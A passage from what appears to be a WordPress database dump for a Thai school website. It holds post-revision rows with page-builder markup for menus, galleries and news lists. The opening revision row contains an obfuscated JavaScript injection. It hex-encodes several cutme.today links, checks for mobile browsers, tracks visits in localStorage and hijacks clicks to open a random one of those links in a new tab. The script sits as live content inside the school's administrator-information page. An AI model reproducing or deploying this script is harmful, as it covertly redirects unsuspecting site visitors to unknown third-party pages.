9\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลผู้บริหาร','','inherit','closed','closed','','469-revision-v1','','','2024-08-02 08:49:39','2024-08-02 01:49:39','',469,'http://pakhaeng.ssk.in.th/?p=470',0,'revision','',0),
(471,1,'2024-08-02 08:51:26','2024-08-02 01:51:26','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a 